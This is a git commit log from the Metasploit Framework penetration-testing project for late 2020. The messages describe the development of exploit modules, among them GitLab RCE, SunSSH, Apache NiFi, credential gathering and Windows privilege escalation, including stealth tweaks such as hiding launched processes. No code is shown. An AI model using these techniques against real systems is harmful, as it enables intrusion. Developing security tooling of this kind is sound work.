2020-12-10 10:56:54 +00:00
Metasploit eefe174e3a automatic module_metadata_base.json update 2020-12-10 01:10:36 -06:00
C4ssandre 38cd5817d7 Updating authors. 2020-12-10 02:09:24 -05:00
William Vu c8f1dfa642 Land #14479, enhanced CVE-2020-25592 check 2020-12-10 00:56:52 -06:00
William Vu d180a81569 Land #14478, enhanced CVE-2020-14882 check 2020-12-10 00:55:41 -06:00
C4ssandre c005492ee9 Updating doc. 2020-12-10 00:58:53 -05:00
C4ssandre 4bfd9e4b2a Fixing a little error. 2020-12-10 05:15:37 -05:00
C4ssandre b7bf7fcc86 Updating functions comments. 2020-12-10 04:08:49 -05:00
C4ssandre 4883050f7f Adding new options to module. Now it is possible to choose which process to launch as SYSTEM, as well as the port the exploit will listen (because on some Windows configuration, WinRM should listen on port 47001). 2020-12-10 03:53:06 -05:00
William Vu 9696e709ae Remove unused vprint_status conditional 2020-12-09 22:48:16 -06:00
William Vu e52084242f Remove unused vprint_status conditional 2020-12-09 22:45:41 -06:00
William Vu 399c8dbb79 Don't be lazy about sending the request
Don't telegraph our command injection _quite_ so much. We still
"complete" the initial command line to minimize disruption.

I am now backgrounding ssh-keygen to improve the speed of the exploit.
2020-12-09 22:07:08 -06:00
William Vu a33a6e6c55 Don't be lazy about checking the redirect
And don't be lazy about sending the request.

To trigger UnexpectedExceptionPage, we can send bogus data instead of
telegraphing our payload-less gadget chain.

God, I'm so lazy. This took like five extra minutes. :|
2020-12-09 21:09:49 -06:00
William Vu 9452c1dcfa Fix merge conflict from #14202, in linear history 2020-12-09 17:24:29 -06:00
Jeffrey Martin 5440415020 force active record object load
In some cases when `empty?` returns true `first` will fail to get db connection
2020-12-09 15:46:27 -06:00
Metasploit 3a7ffc7675 automatic module_metadata_base.json update 2020-12-09 15:34:53 -06:00
Spencer McIntyre 367c5e747f Land #14470, Fix ssi template for some sharepoint versions 2020-12-09 16:23:34 -05:00
Matt c29f746225 Updated Result Proof To Identify Windows Systems From Cygwin Shells 2020-12-09 11:20:59 -07:00
Metasploit f610336248 automatic module_metadata_base.json update 2020-12-09 11:40:24 -06:00
Shelby Pace d337d832b8 Land #14422, add GitLab file read/rce 2020-12-09 11:34:14 -06:00
Metasploit 50ac569aeb automatic module_metadata_base.json update 2020-12-09 11:30:51 -06:00
Shelby Pace 941762b3c5 remove trailing commas 2020-12-09 11:29:00 -06:00
Tim W fb9b1c5de4 Land #14409, add weak services technique to the service permissions LPE 2020-12-09 17:16:53 +00:00
Metasploit 64092ff563 automatic module_metadata_base.json update 2020-12-09 09:35:21 -06:00
Spencer McIntyre 59339f3337 Land #14418, Wordpress plugin Email Subscribers & Newsletters sqli (CVE-2019-20361) 2020-12-09 10:29:32 -05:00
dwelch-r7 dae27fb3ba Make the EICAR canary useful again 2020-12-09 14:47:22 +00:00
Metasploit 36b94340f0 automatic module_metadata_base.json update 2020-12-09 08:18:49 -06:00
Spencer McIntyre 90a99ae7c3 Land #14423, Expand wordpress_scanner to look for themes & plugins 2020-12-09 09:12:28 -05:00
C4ssandre f8a7517633 Improving description of SHUTDOWN_SERVICES option. 2020-12-09 08:01:56 +00:00
C4ssandre 7a358cf577 Giving to the user the choice for if the module should attempt or not to shutdown WinRM and BITS services. 2020-12-09 07:43:32 +00:00
C4ssandre d2db1fba4a Updating exploit metatdata. 2020-12-09 07:06:31 +00:00
C4ssandre 8f72102116 Updating exploit description (got by "info" command). 2020-12-09 06:55:17 +00:00
C4ssandre d43fba1ae1 Adding new check functionalities. Now, ruby module check through the previous meterpreter session if BITS and WinRM are currently running, and tries to shutdown them if they are. It is not necessary anymore to deal with windows versions to know if target is vulnerable: the module can guess it reliably by its own. 2020-12-09 06:47:29 +00:00
h00die e3e3895ec5 forgot an R 2020-12-08 20:58:29 -05:00
h00die 13967a40d2 updates to easy wp smtp module 2020-12-08 20:51:54 -05:00
Spencer McIntyre 175d4a5c43 Add a check to see if the session is already running as SYSTEM 2020-12-08 18:05:28 -05:00
Spencer McIntyre 6d7c6c054a Update the module docs with more details for the registry technique 2020-12-08 17:39:34 -05:00
Metasploit 06a6ee4554 automatic module_metadata_base.json update 2020-12-08 16:34:30 -06:00
Spencer McIntyre dcb1637ac2 Land #14463, web_delivery: Add SyncAppvPublishingServer target 2020-12-08 17:28:15 -05:00
Spencer McIntyre e7f8d00717 Note technique compatibility and fix the reference URL 2020-12-08 17:26:39 -05:00
Spencer McIntyre 15fb9a1760 Remove the details from the wordpress checkcode tests 2020-12-08 17:05:27 -05:00
h00die 3b9183f198 working 2020-12-08 16:49:45 -05:00
C4ssandre 61f76b77b9 Removing useless token verification batch of code. 2020-12-08 13:43:32 -05:00
C4ssandre d997b07ded Fixing inconsistency in flags for spnego token processes. 2020-12-08 13:35:40 -05:00
C4ssandre bda377cb7e Passing "notepad.exe" to const. 2020-12-08 13:19:56 -05:00
C4ssandre 43b49672d3 Removing old commented code. 2020-12-08 13:16:10 -05:00
C4ssandre b903595443 Improving function in charge of isolate B64 negotiate token from NTLM1 request. 2020-12-08 13:14:45 -05:00
Alan Foster 9e20bb5270 Add configurable logging to the console and support stdout sinks 2020-12-08 16:23:24 +00:00
C4ssandre 58997efe9d Complete change of IsTokenSystem function. Now the function uses windows built in API to check if token is system instead of checking username wstring. I did that because I noticed that in foreign language, SYSTEM account can be called differently such as "système" in french. Moreover, the original function was buggy and the exploit only succeeded because the tested account was called "système", and the function checked that the account is different from "SYSTEM". 2020-12-08 10:39:45 -05:00
Brendan Coles 3f0336bac0 Msf::Auxiliary::EPMP: replace hard-coded port 80 with rport 2020-12-08 15:24:17 +00:00
Metasploit cb926e7928 automatic module_metadata_base.json update 2020-12-08 06:59:16 -06:00
adfoster-r7 85a9accbee Land #14202, Add initial zeitwerk autoloader approach for lib/msf/core 2020-12-08 12:53:02 +00:00
C4ssandre b39eb0658a Reorganizing code in order to free allocated memory space. 2020-12-08 00:11:49 -05:00
C4ssandre 6821e52095 Adding a calloc check. 2020-12-07 23:45:12 -05:00
C4ssandre 669e668b65 Fixing potential buffer overflow. 2020-12-07 23:42:04 -05:00
C4ssandre c7d9d02490 Initializing service at zero. 2020-12-07 23:26:36 -05:00
C4ssandre e58c14add7 Removing old and weird commented code. 2020-12-07 23:25:59 -05:00
C4ssandre 60638160a7 Replacing all manual zero initializations by one ZeroMemory at start of constructor. 2020-12-07 23:24:54 -05:00
C4ssandre 748d11dfe4 Removing a useless batch of code remaining from outdated powershell functions. 2020-12-07 22:43:15 -05:00
C4ssandre 134c0fdc73 Fixing an issue in getting notepad path. 2020-12-08 03:13:39 +00:00
C4ssandre 6bdbdd7f62 Removing a useless call to WTSGetActiveConsoleSessionId 2020-12-07 21:39:07 -05:00
C4ssandre ff8981c4ee Various little corrections. 2020-12-07 21:38:55 -05:00
C4ssandre c86f93b9c0 Updating list of tested machines. 2020-12-07 21:38:42 -05:00
C4ssandre 8a3790f265 Adding process informations to hide notepad.exe when launching. 2020-12-07 21:38:30 -05:00
C4ssandre 46f59a76f0 Removing powershell payload serving method, and replacing it by just writing and executing in remote SYSTEM process. 2020-12-07 21:37:35 -05:00
C4ssandre b935842cc5 Updating an outdated comment. 2020-12-07 21:37:24 -05:00
C4ssandre d05bffdab3 Adding more detailed debug messages. 2020-12-07 21:36:34 -05:00
h00die 4d36a107e6 reverse logic 2020-12-07 18:47:45 -05:00
h00die ac26d4d79b wordpress version update 2020-12-07 18:36:53 -05:00
Metasploit 384e99ffd7 automatic module_metadata_base.json update 2020-12-07 16:28:43 -06:00
Shelby Pace 30bf917075 Land #14401, add Windows support for consul rce 2020-12-07 16:21:36 -06:00
Shelby Pace 45ce738af7 add default payload for targets, run rubocop 2020-12-07 16:17:12 -06:00
bwatters d6095fe169 Land #14448, Railgun datatype updates
Merge branch 'land-14448' into upstream-master
2020-12-07 16:15:59 -06:00
Metasploit 3e9a58518c automatic module_metadata_base.json update 2020-12-07 14:36:07 -06:00
Shelby Pace 8e1cab0131 Land #14339, add flexdotnetcms rce 2020-12-07 14:28:01 -06:00
Shelby Pace cd900a0507 fix comment 2020-12-07 14:27:07 -06:00
Spencer McIntyre 2a2694ef16 Apply rubocop changes and precompute the encryption key 2020-12-07 14:59:40 -05:00
Spencer McIntyre d208e441ba Update the documentation 2020-12-07 10:54:20 -05:00
Spencer McIntyre 811de07e7a Add logout functionality and cleanup HTTP session management 2020-12-07 10:41:42 -05:00
Spencer McIntyre b968cf9183 Cleanup the payload delivery mechanism 2020-12-07 09:40:29 -05:00
S3cur3Th1ssh1t 6c1ac7f9a2 Fix ssi template for some sharepoint versions 2020-12-07 14:34:09 +01:00
dwelch-r7 49a6b1b257 Remove requires that sneaked in while the PR was up 2020-12-07 11:02:10 +00:00
dwelch-r7 1617b3ec9b Use zeitwerk for lib/msf/core folder 2020-12-07 10:31:45 +00:00
William Vu c5d47532b0 Clarify sending username where password expected 2020-12-07 01:55:18 -06:00
William Vu a69269a101 Update module doc 2020-12-07 01:35:59 -06:00
William Vu d1f307324b Refactor exploit to use improved CheckModule
And add AutoCheck.
2020-12-07 01:35:13 -06:00
William Vu e5941cc4a8 Refactor aux/scanner/ssh/ssh_version for CheckCode 2020-12-07 01:35:13 -06:00
William Vu 010e110b8d Fix indentation
Whoops!
2020-12-07 01:35:13 -06:00
William Vu 6066ad47bd Remove unnecessary includes 2020-12-07 01:35:13 -06:00
William Vu e0561c03e9 Remove useless comment 2020-12-07 01:35:13 -06:00
William Vu af27d91eea Fix download link
I was logged in.
2020-12-07 01:35:13 -06:00
William Vu 4da3e37328 Remove unchanged offset 2020-12-07 01:35:13 -06:00
William Vu 9ac5725ce3 Show how to find libc base 2020-12-07 01:35:13 -06:00
William Vu 4afb4562d9 Print on failure 2020-12-07 01:35:13 -06:00
William Vu 88f0fab6f4 Don't hardcode a stack address for the payload 2020-12-07 01:35:13 -06:00
William Vu 0211c2c6e8 Add module doc 2020-12-07 01:35:13 -06:00
William Vu 6b45552bda Swap target priority 2020-12-07 01:35:13 -06:00
William Vu bed3f9b41c Note VMware Player support
Thanks to @bcoles for testing.
2020-12-07 01:35:13 -06:00
William Vu 1cfcb9b351 Clarify Solaris version
Hat tip @bcoles.
2020-12-07 01:35:13 -06:00
William Vu d6c64865ea Add Solaris SunSSH PAM parse_user_name() exploit
CVE-2020-14871
2020-12-07 01:35:13 -06:00
William Vu 967f573b8d Refactor Msf::Exploit::Remote::SSH 2020-12-07 01:35:13 -06:00
alanfoster 835059f00c [CVE-2020-10977] Gitlab arbitrary file read to RCE 2020-12-07 01:26:54 +00:00
Noam Rathaus 78ab3b089b Allow ignoring SSL, debug the requests 2020-12-06 04:37:51 -05:00
Metasploit d7852716f9 automatic module_metadata_base.json update 2020-12-06 01:34:10 -06:00
Grant Willcox a96a290d32 Land #14467, Add missing CheckCode::Unknown return code if the response object is empty to fix #14462 2020-12-06 01:25:17 -06:00
Grant Willcox 02ebe745d9 Improve the CheckCode::Unknown No Response error message to make it clearer to users 2020-12-06 01:24:51 -06:00
Metasploit 59f42314ac automatic module_metadata_base.json update 2020-12-06 00:02:43 -06:00
Grant Willcox e26d6ca683 Land #14458, Add auxiliary support to autocheck mixin 2020-12-05 23:54:41 -06:00
Grant Willcox b6f342c3ab Land #14460, Bump payloads gem to 2.0.24 to fix issue #14428, a unicode character error in stdapi sys.process.execute 2020-12-05 21:34:30 -06:00
Brendan Coles eb7514d94d nimcontroller_bof: return CheckCode::Unknown if response is empty 2020-12-06 03:16:39 +00:00
Metasploit 0c48ae86bf automatic module_metadata_base.json update 2020-12-05 08:28:39 -06:00
cgranleese-r7 96c62aea20 Lands #14411 Fixes eternalblue-win8 to run only with python3 2020-12-05 14:22:32 +00:00
Brendan Coles 6cdb484d7c Add Aerospike Database UDF Lua Code Execution exploit 2020-12-05 14:15:22 +00:00
Brendan Coles 9bf532edd8 web_delivery: Add SyncAppvPublishingServer target 2020-12-05 06:24:55 +00:00
h00die b21fccebaa updates from review 2020-12-04 21:50:31 -05:00
Spencer McIntyre 7612845714 Add the initial Ruby port for CVE-2020-8260 2020-12-04 17:56:38 -05:00
Grant Willcox 9376accc05 Land #14410, Add synchronization to the DLL payload template 2020-12-04 16:08:18 -06:00
Metasploit 7ef0dd40b1 Bump version of framework to 6.0.21 2020-12-04 11:39:09 -06:00
Grant Willcox fd4749488f Land #14445, Update XML import to utilize base64 decoding on the body 2020-12-04 11:06:12 -06:00
Metasploit 5716b53803 automatic module_metadata_base.json update 2020-12-04 10:11:49 -06:00
Grant Willcox 5961bf700d Land #14314, Pulse Secure Connect Client Credentials Gatherer 2020-12-04 10:04:43 -06:00
Tim W 12607d0a34 Land #14449, allow running local exploits from meterpreter prompt 2020-12-04 14:38:49 +00:00
Alan Foster dc37861022 Add puma to gemspec 2020-12-04 09:50:10 +00:00
cn-kali-team 8f729b6fd5 removed this JSON 2020-12-04 11:26:01 +08:00
Spencer McIntyre e66df07324 Merge pull request #13 from timwr/pr-14449
fix meterpreter > run tab completion
2020-12-03 18:13:17 -05:00
Tim W 00bd024da2 fix #14428, fix execute files with unicode characters in stdapi sys.process.execute 2020-12-03 15:30:23 -06:00
Metasploit 5a80d3d649 Bump version of framework to 6.0.20 2020-12-03 11:53:31 -06:00
Spencer McIntyre 7d97e2e306 Fix a couple of railgun related bugs with the new refactoring 2020-12-03 12:09:35 -05:00
Tim W 52a0ccd58d fix meterpreter > run tab completion 2020-12-03 16:48:47 +00:00
A Galway c83c21bcea additional string to byte conversions 2020-12-03 16:21:55 +00:00
Matthew Hagan a232839a81 Update Unserialized Body For Binary Type
Co-authored-by: acammack-r7 <adam_cammack@rapid7.com>
2020-12-03 09:18:16 -07:00
Metasploit 0e67748326 automatic module_metadata_base.json update 2020-12-03 10:03:35 -06:00
adfoster-r7 cd032278ba Land #14437, ensure the module cache doesn't mutate module's strings when using force_encoding 2020-12-03 15:57:26 +00:00
Spencer McIntyre 2b48c4234c Land #14442, fix the session cookie for the Simple PHP Blog exploit 2020-12-03 08:47:20 -05:00
Quentin Kaiser e8ea9e56ee Print a status message when no credentials are found. 2020-12-03 10:19:56 +01:00
Quentin Kaiser c8f534e420 Merge branch 'enum_pulsesecure' of github.com:QKaiser/metasploit-framework into enum_pulsesecure 2020-12-03 10:12:54 +01:00
Quentin Kaiser 4f947ac2cb Properly close files that we open and properly capture file open error in get_username. 2020-12-03 10:12:33 +01:00
Alan Foster 76e967353e Add auxiliary support to autocheck mixin 2020-12-03 01:09:06 +00:00
bwatters 9abf199fbe Lands #14337, Ref #14336 : Fix Windows PingBack_Reverse_TCP Payload
Merge branch 'land-14337' into upstream-master
2020-12-02 16:39:19 -06:00
Quentin Kaiser 585bc99903 Proper return values
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2020-12-02 21:34:56 +01:00
Quentin Kaiser f4bb5f7e10 Uniform error handling applied to all functions interacting with 'session' object. 2020-12-02 20:51:29 +01:00
Quentin Kaiser 94af390649 Document Ruby construct that might be unclear to newcomers. 2020-12-02 20:43:39 +01:00
Quentin Kaiser dbd3f2e1bf Revert back on AutoCheck. 2020-12-02 20:42:05 +01:00
Spencer McIntyre a322647913 Change the cookie to PHPSESSID from my_id for the Simple PHP blog exploit 2020-12-02 10:09:05 -05:00
bwatters 5d7014bf39 Land #14298, Windows post-exploitation gather module - Memory dumping via Avast AvDump utility
Merge branch 'land-14298' into upstream-master
2020-12-02 08:30:38 -06:00
adfoster-r7 2b3d4b986f Land #14447, add additional exempt labels to stale bot 2020-12-02 09:21:23 +00:00
Quentin Kaiser bf0d4b4c3f Better regular expression for version line. 2020-12-02 10:05:17 +01:00
Quentin Kaiser 5d89b32f58 prepend class rather than import it 2020-12-02 10:03:38 +01:00
Quentin Kaiser 8edcae4bb7 Handle a case where Pulse Secure is installed but no saved entry exists in the registry. Handle a case where the session runs as system on an affected version. 2020-12-02 09:57:28 +01:00
Spencer McIntyre c0143e7111 Fix two PVOID definitions to the correct LPVOID 2020-12-01 18:00:23 -05:00
Spencer McIntyre 7303975377 Initialize the exploit UI earlier on so error messages are displayed 2020-12-01 16:36:39 -05:00
Spencer McIntyre 35362b2503 Set a default payload when running local exploit modules 2020-12-01 16:30:29 -05:00
Spencer McIntyre 2b1d7f18ec Tab complete local exploits when running modules from within meterpreter
This does slow down tab completion so maybe it should be left out?
2020-12-01 16:01:57 -05:00
Spencer McIntyre f82ce5335d Support running local exploits from the meterpreter context 2020-12-01 15:22:48 -05:00
Spencer McIntyre cea4c92781 Clarify the message by printing the actual path 2020-12-01 13:41:01 -05:00
Spencer McIntyre 0ef912d489 Consolidate railgun code 2020-12-01 12:27:12 -05:00
Spencer McIntyre 7e78721788 Add and use a ULONG_PTR / PULONG_PTR data type in railgun 2020-12-01 10:42:28 -05:00
dwelch-r7 6f0bf7d2a6 Add more exempt labels 2020-12-01 13:20:14 +00:00
Spencer McIntyre 0bf9dcfdb8 Check that additional success checks for the registry technique 2020-11-30 18:03:58 -05:00
C4ssandre 7d0c6c3b87 Applying rubocop. 2020-11-30 15:09:53 +00:00
C4ssandre 612096ce03 Passing default waiting time for module to complete from 20 to 120. 2020-11-30 15:02:16 +00:00
C4ssandre c7f832526d Fixing unfree-ed allocated memory space. 2020-11-30 14:54:19 +00:00
C4ssandre 381d371e8e Adding a check after memory allocation for localNegotiator object. 2020-11-30 14:47:20 +00:00
C4ssandre 08a744c1a6 Fixing a bad return code (ERROR_HEAP_ALLOC_FAILURE -> ERROR_NOT_ENOUGH_PRIVILEGES). 2020-11-30 14:44:20 +00:00
C4ssandre 0ce9d585cb Adding a line of dprintf for debugging. 2020-11-30 14:42:22 +00:00
C4ssandre 9d298c4059 Change code line for improving readability. 2020-11-30 14:39:10 +00:00
C4ssandre b894053efe Changing instance variables to local variables. 2020-11-30 14:31:45 +00:00
C4ssandre 71a33301b7 Removing outdated comment. 2020-11-30 14:27:40 +00:00
C4ssandre e6cffac948 Function check: changing if os =~ /Server/ to if os.include?('Server') to avoid compiling a regular expression. 2020-11-30 14:23:54 +00:00
C4ssandre 4c317fe359 Applying rubocop to ruby module file. 2020-11-30 14:21:41 +00:00
C4ssandre f901e91d70 Fixing markdown content and formatting issues. Markdown is not yet complete and will need additional modification when other changes will be brought to ruby module and C dll. 2020-11-30 14:12:57 +00:00
adfoster-r7 2cb2e38c49 Land #14443, Add explicit requires for python payloads to avoid NameError exceptions 2020-11-30 09:50:36 +00:00
dwelch-r7 c92d97ef7d Add requires for python payloads 2020-11-30 05:36:30 +00:00
dwelch-r7 3824f3923f Land #14394, Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion
Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion
2020-11-30 05:15:29 +00:00
SunCSR Team 3fbe851d71 Update tomcat_ghostcat.rb 2020-11-30 08:33:32 +07:00
justinopatrny c200a274b2 Corrected headers check for retrieved cookie
Previous get_cookies method not working properly
2020-11-29 19:07:44 -06:00
James Lee bc3d41bbe8 Request json response
For compatibility with older versions of Solr (I tested 5.3.0) where the
default is XML.
2020-11-29 17:57:36 -06:00
James Lee 4b5dd7389c Cleanup debug prints 2020-11-29 13:15:14 -06:00
James Lee 4496fe0d82 Randomize the header name for commands 2020-11-29 11:32:35 -06:00
James Lee 1be51ded25 Use HTTP ClassLoader instead 2020-11-29 10:53:33 -06:00
Quentin Kaiser 985aa59e2b Update documentation with scenarios of each branch (9.0.x, 9.1.x) running on Windows 10 with different privileges (unprivileged user, system) where applicable. 2020-11-27 17:15:19 +01:00
Quentin Kaiser 7842d746d3 Wrong return code when Pulse is not installed. 2020-11-27 16:19:52 +01:00
Quentin Kaiser 0ed2b0d253 Fix active record issue when realm is blank due to empty path. 2020-11-27 16:18:21 +01:00
Quentin Kaiser 013a1e4312 Username was not found when running the module just after the connection creation. Turns out it was saved in .tmp rather than .dat or .bak. 2020-11-27 15:11:14 +01:00
Tim W 6de55b3d79 Land #14433, fix typo in exploits/windows/local/bypassuac_comhijack.rb 2020-11-26 20:13:42 +00:00
Tim W 87eba681e0 Land #14365, Update TP-Link AC1750 Pwn2Own 2019 module 2020-11-26 19:55:00 +00:00
Metasploit 9bf921c007 Bump version of framework to 6.0.19 2020-11-26 11:55:30 -06:00
Christophe De La Fuente e40eb20032 Land #14216, Add new Apache NiFi RCE exploit module 2020-11-26 18:36:27 +01:00
cgranleese-r7 8d1345de73 updates .each to .map
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2020-11-26 15:21:10 +00:00
cgranleese-r7 8bc34038ea Adds a fix for frozen string bug when using reload_all 2020-11-26 14:52:15 +00:00
Pedro Ribeiro a99ce581dd Update TP-Link AC1750 Pwn2Own 2019 module 2020-11-26 12:56:02 +00:00
Graeme Robinson f6f78d4710 Make changes suggested in code review 2020-11-26 13:46:02 +01:00
Graeme Robinson 7fa10a0684 Update modules/exploits/multi/http/apache_nifi_processor_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-11-26 13:46:02 +01:00
Graeme Robinson 5dc7e8f04e Update modules/exploits/multi/http/apache_nifi_processor_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-11-26 13:46:02 +01:00
Graeme Robinson 78c042cbb7 Update modules/exploits/multi/http/apache_nifi_processor_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-11-26 13:46:01 +01:00
Graeme Robinson 7894f1eb9a Update modules/exploits/multi/http/apache_nifi_processor_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-11-26 13:46:01 +01:00
Graeme Robinson fcde932e1b Update modules/exploits/multi/http/apache_nifi_processor_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-11-26 13:46:01 +01:00
Graeme Robinson 2a9898df25 Update modules/exploits/multi/http/apache_nifi_processor_rce.rb
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-11-26 13:46:01 +01:00
Graeme Robinson 9a35a5fdee Remove frozen_string_literal directive
Remove directive that was added by `rubocop -A`, as suggested in review.

Note that this results in an additional offense being reported by rubocop
2020-11-26 13:46:01 +01:00
Graeme Robinson 8e534ffc22 Split scenarios to separate blocks for each target
As suggested in https://github.com/rapid7/metasploit-framework/pull/14216#discussion_r512868894.
2020-11-26 13:46:01 +01:00
Graeme Robinson 536e1a1a02 Fix typo in documentation 2020-11-26 13:46:01 +01:00
Graeme Robinson e33a2ca463 Use cleanup method to perform cleanup 2020-11-26 13:46:01 +01:00
Graeme Robinson c280bb67e7 Wrap at 140 characters to appease msftidy_docs.rb. 2020-11-26 13:46:01 +01:00
Graeme Robinson f6d39147af Removed pointless comment. 2020-11-26 13:46:01 +01:00
Graeme Robinson 4dc564e62b Added documentation for module. 2020-11-26 13:46:01 +01:00
Graeme Robinson 2de77b6e8a Refactored code. Primarily line length increased. 2020-11-26 13:46:01 +01:00
Graeme Robinson 012b040fc1 Reformat code layout to satisfy msftidy 2020-11-26 13:46:01 +01:00
Graeme Robinson 41ff86178b Add new module exploit module
Add new module /exploits/multi/http/apache_nifi_processor_rce.rb
2020-11-26 13:46:01 +01:00
Jan Bucher 6d6c71bc2a Fix another typo in the bypassuac_comhijack module 2020-11-26 13:14:36 +01:00
Jan Bucher 9757c68f9b Fix typo in modules/exploits/windows/local/bypassuac module
Correct small typo in the output to the msfconsole.
2020-11-26 12:55:29 +01:00
SunCSR Team 4dce7c070b Update tomcat_ghostcat.rb 2020-11-26 16:24:49 +07:00
Matthew Hagan a06f605675 Updated XML Import To Utilize Base64 Decoding On The Body 2020-11-25 11:48:58 -07:00
Grant Willcox de65a1368b Land #13954, expand src path in cmd_upload and cmd_download before using it 2020-11-25 10:55:20 -06:00
Grant Willcox 63a98adff0 Land #14427, phpstudy_backdoor_rce.rb TARGETURI handling and default value modifications 2020-11-25 10:32:53 -06:00
Grant Willcox ca28f59ac4 Update the description of the TARGETURI option to reflect the recent changes 2020-11-25 10:32:17 -06:00
Spencer McIntyre 95665e916c Land #14416, wordpress plugin 'simple file list' rce 2020-11-25 09:58:26 -05:00
Spencer McIntyre 94c157bc95 Tweak the documentation and module output just a little for clarity 2020-11-25 09:58:07 -05:00
Quentin Kaiser 54e836e797 Add guard clause to gather_creds function to remove conditional block. 2020-11-25 15:36:37 +01:00
Quentin Kaiser 15bdffdee1 Remove redundant else after return.
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-25 15:31:13 +01:00
Quentin Kaiser 7f130b4414 Switch to idiomatic next guard clause.
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-25 15:30:38 +01:00
Quentin Kaiser c4b0253d93 Switch to idiomatic guard clause.
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-25 15:29:44 +01:00
Quentin Kaiser 53a1f2f19b conditional next call style update 1
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-25 15:27:22 +01:00
Quentin Kaiser e069b0d607 Execute data conversion using built-in methods rather than custom encoders. 2020-11-25 14:41:21 +01:00
Quentin Kaiser 8024c08882 Do not save entry to service data if we can't resolve the host. 2020-11-25 13:52:42 +01:00
Quentin Kaiser a0265e0d6c Remove unnecessary second argument to registry_enumvals. 2020-11-25 13:39:37 +01:00
cn-kali-team 893dd6b653 fix #14158 2020-11-25 20:07:00 +08:00
Quentin Kaiser fc083d197a Finally found how to encode entropy to UTF-16LE representation in Ruby. 2020-11-25 12:58:19 +01:00
Quentin Kaiser cf405879d6 Fix hash wording. 2020-11-25 12:46:23 +01:00
Quentin Kaiser 6a4237f4e3 Uniform error handling. 2020-11-25 12:40:42 +01:00
Quentin Kaiser debaa44733 Safer connection store file reading by handling the case where user does not have permissions to read the file. 2020-11-25 12:33:28 +01:00
Quentin Kaiser 26a3342a3d Move version verification to a check function using Msf::Exploit::Remote::AutoCheck. Safer version file reading by handling the case where user does not have permissions to read the file. Cleaner status messages in check function. 2020-11-25 12:12:34 +01:00
cgranleese-r7 31426576e0 Land #14264, Add exploit/multi/http/kong_gateway_admin_api_rce 2020-11-25 11:09:02 +00:00
Quentin Kaiser 50b25989fa Safer handling of registry access operation when executing from unprivileged process. 2020-11-25 11:41:34 +01:00
Natto 8f35e3c627 Create shodan_host.rb 2020-11-25 12:57:48 +08:00
Spencer McIntyre 1151d3dcc7 Land #14419, Update external dev scripts and wordpress wordlists 2020-11-24 17:48:05 -05:00
Grant Willcox 0435f30f55 Fix up the Meterpreter fs.rb file so that we now appropraitely expand local paths 2020-11-24 16:30:45 -06:00
Metasploit eeaf795edd automatic module_metadata_base.json update 2020-11-24 13:51:04 -06:00
Grant Willcox efdc7f062e Land #14241, OpenMediaVault 5.5.11 Authenticated Remote Code Execution 2020-11-24 13:42:53 -06:00
Grant Willcox e0a8aff72b Ninja edit in fix to remove support for IN_MEMORY Unix payloads since most of them don't work correctly or return multiple shells if they do work. Will potentially add this in with another PR once fixes are made to make it more reliable 2020-11-24 13:41:57 -06:00
Grant Willcox e648a055fc Add in RuboCop fixes to the module 2020-11-24 12:31:05 -06:00
Grant Willcox bd00ce9177 Add in fixes from review 2020-11-24 12:08:51 -06:00
Spencer McIntyre d4b2babae1 Report success when leveraging the registry permissions technique 2020-11-24 09:06:13 -05:00
adfoster-r7 1c06e0474e Land #14425, update tests for ruby 2.7 deprecations 2020-11-24 13:28:22 +00:00
adfoster-r7 327e66748c Land #14412, Fixes ssh_login gather proof issue when user has low privileges 2020-11-24 12:45:25 +00:00
Natto c8fc5b52cf TARGETURI Default value modification
TARGETURI Default value modification
2020-11-24 14:05:49 +08:00
Metasploit 1b25ba0b79 automatic module_metadata_base.json update 2020-11-23 17:06:47 -06:00
Spencer McIntyre 19cf6e3c94 Land #14325, fix #14207, fix python/shell_reverse_tcp on python3 2020-11-23 17:59:41 -05:00
Metasploit f85a86214e automatic module_metadata_base.json update 2020-11-23 08:18:00 -06:00
A Galway 3fcea08cb8 Land #14405, presents new error message on attempted meterpreter upgrade 2020-11-23 14:09:42 +00:00
kalba-security 9417266d21 replace Checkcode:Unknown with Detected in check(), skip cleanup unless required 2020-11-23 08:17:44 -05:00
Graeme Robinson 8e299de712 Update modules/exploits/multi/http/kong_gateway_admin_api_rce.rb
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2020-11-22 14:49:51 +00:00
h00die a988e85d90 remove not needed code 2020-11-22 09:07:11 -05:00
h00die ff3ddffcb5 fix docs 2020-11-22 09:04:23 -05:00
h00die 0832fe17f0 use fail_with 2020-11-22 09:02:54 -05:00
h00die bf60c4678d to be to to eq 2020-11-22 08:47:10 -05:00
h00die ac8f729d36 fix up some spec 2020-11-22 08:44:40 -05:00
h00die a855a455ce wordpress version lib return plugin version 2020-11-22 07:52:00 -05:00
h00die 7138f6e48b cleanup 2020-11-22 07:51:03 -05:00
h00die 98d00f47f3 tidy 2020-11-22 07:48:54 -05:00
Grant Willcox 21bfb41b48 Land #14417, Line wrap Metasploit tips at 60 columns 2020-11-21 23:17:50 -06:00
Jared Stroud 1d9e1d9600 Merge branch 'windows-post-avast-memory-dump' of github.com:archcloudlabs/metasploit-framework into windows-post-avast-memory-dump 2020-11-21 22:24:49 -05:00
Jared Stroud c5222bead9 adding blog as further references 2020-11-21 22:24:35 -05:00
DLL_Cool_J 0ec6d4c142 Update modules/post/windows/gather/avast_memory_dump.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-21 22:16:55 -05:00
h00die f8a51d0445 fix up joomla python code 2020-11-21 12:43:30 -05:00
h00die 4de58b8596 python 4 space not ruby 2 2020-11-21 12:43:06 -05:00
